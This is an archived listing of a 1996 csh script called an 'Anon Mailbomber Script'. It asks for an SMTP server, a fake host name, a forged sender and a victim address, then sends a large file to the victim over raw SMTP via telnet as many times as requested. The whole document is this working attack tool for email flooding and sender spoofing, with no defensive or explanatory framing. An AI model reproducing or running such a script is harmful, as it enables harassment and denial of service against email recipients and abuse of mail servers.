home *** CD-ROM | disk | FTP | other *** search
/ HPAVC / HPAVC CD-ROM.iso / ANON.ZIP / MAILBMB2.SH < prev    next >
Linux/UNIX/POSIX Shell Script  |  1996-01-13  |  869b  |  31 lines

  1. #! /bin/csh
  2. ##Anon Mailbomber Script
  3. ##You may need to screw w/ the sleep times if this doesn't work.
  4. echo -n "What is the name of the SMTP server you want to use?"
  5. set serv = $<
  6.  
  7. echo -n "What is the fake host name?"
  8. set fake = $<
  9.  
  10. echo -n "Who should it appear to be from? (usr@host)"
  11. set from = $<
  12.  
  13. echo -n "Who is the lucky recipient?" 
  14. set to = $<
  15.  
  16. echo -n "Name of the BIG file you want to mail?"
  17. set file = $<
  18.  
  19. echo -n "How many times should it be sent ?"
  20. set amount = $<
  21. set loop_count = 1
  22. echo "Don't press anything untill you see the Mailbomb Complete message."
  23. while ($loop_count <= $amount)
  24. (sleep 3;echo "helo" $fake;sleep 1;echo "mail from:"$from;sleep 1;echo "rcpt to:"$to;sleep 1;echo data;echo "From:"$from;sleep 1;cat $file;echo ".";sleep 2;echo "quit") | telnet $serv 25 
  25.     @ loop_count++
  26. end
  27. echo "Mailbomb Complete"
  28.  
  29.  
  30.  
  31.